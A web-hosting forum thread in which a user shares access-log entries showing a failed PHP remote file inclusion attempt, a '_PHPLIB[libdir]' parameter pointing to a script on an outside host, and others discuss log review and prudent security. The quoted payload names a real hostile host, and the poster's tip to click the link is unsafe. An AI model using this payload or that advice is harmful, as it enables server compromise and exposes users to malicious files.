What a hack attempt looks like in your log files.

[MyWebs]

I noticed today a very suspecious entry while viewing my log files and thought I would share it here so others might know what sort of thing to look out for. Its a good idea imo to click the link to make sure it didn't work too if you ever spot something like this. I could be wrong about this though. :/

Host: 85.111.12.199

//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt???
Http Code: 200 Date: Nov 09 08:56:25 Http Version: HTTP/1.1 Size in Bytes: 9413
Referer: -
Agent: Mozilla/5.0

/Stats.php//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt???
Http Code: 200 Date: Nov 09 08:56:28 Http Version: HTTP/1.1 Size in Bytes: 9137
Referer: -
Agent: Mozilla/5.0

It didn't seem to work in this case but I did report this to www.fileave.com to get it removed from there because that file is quite obviously used for hacking if you was to have a look at it. And to the persons ISP as well. Sadly its in Turkey and I doubt they will do much. Guess I will see if they respond back to me.

When you look at your log files, you do do this ever so often, right? If you see something like:
//?_PHPLIB[libdir]=http://jokoyuma.fileave.com/idsatu.txt??? for a requested URL this should throw a red flag in your mind.

Thankfully WHB has good security in place and this hacking attempt failed.
I hope this helps other to know what sort of bad stuff to be on the look out for.
Thanks,
MyWebs

[Tony]

I have no idea what you're talking about. I mean,

• why should this worry me if I did see it, and
• why (and how?) would I be looking at log files?

[Colin]

You should check the access logs on your server every once in a while, though one of the big problems is parsing and reading it correctly. Mostly what is needed when looking through the logs is attempts to access files which don't exists, that way you can figure out why and perhaps take corrective actions. In some cases, it's a bot probing for a file which is "a known security issue" especially with some of the software packages which are out there. So if you have, say a Jomba website, and you see a bunch of hits on particular INTERIOR files, with no referrer FROM YOUR SITE, then it's a hacking attempt.

Interior file: File which is not called directly from the internets, usually it's a module which does something for the software package you are using.

[Alan B]

I think it's safest to assume that there will be hacking attempts on all sites. Most of these attempts are automated, so they hit loads of sites very quickly. The goal must be not to try to monitor all attempts, which really is impossible, but, rather, to take all prudent security measures. That will ensure that the inevitable hack attempts will not succeed.

You can't prevent hack attempts. You can prevent them from succeeding.